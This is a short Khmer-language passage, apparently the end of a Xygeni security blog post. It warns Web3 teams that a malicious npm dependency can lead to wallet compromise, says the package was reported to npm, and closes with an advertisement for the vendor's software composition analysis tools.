សម្រាប់ក្រុម Web3 មេរៀនគឺច្បាស់លាស់៖ ចាត់ទុកឈ្មោះអាស្រ័យជាផ្នែកមួយនៃគំរូគំរាមកំហែងរបស់អ្នក។ កញ្ចប់ដែលមើលទៅដូចជាជំនួយការដែលគ្មានគ្រោះថ្នាក់នៅតែអាចក្លាយជាផ្លូវខ្លីបំផុតទៅកាន់ការសម្របសម្រួលកាបូប។

បានរាយការណ៍ទៅកាន់បញ្ជីឈ្មោះ npm។ យើងនឹងធ្វើបច្ចុប្បន្នភាពប្រកាសនេះនៅពេលដែលគណនីអ្នកបោះពុម្ពផ្សាយ និងកញ្ចប់ត្រូវបានដកចេញ។

ឧបករណ៍វិភាគសមាសភាពកម្មវិធី sca
ផ្តល់អាទិភាព ដោះស្រាយ និងធានាសុវត្ថិភាពហានិភ័យផ្នែកទន់របស់អ្នក
ទទួលបានគណនីឥតគិតថ្លៃរបស់អ្នក។
មិនតម្រូវឱ្យមានកាតឥណទានទេ។

ធានាសុវត្ថិភាពនៃការអភិវឌ្ឍន៍ និងការដឹកជញ្ជូនកម្មវិធីរបស់អ្នក

ជាមួយឈុតផលិតផល Xygeni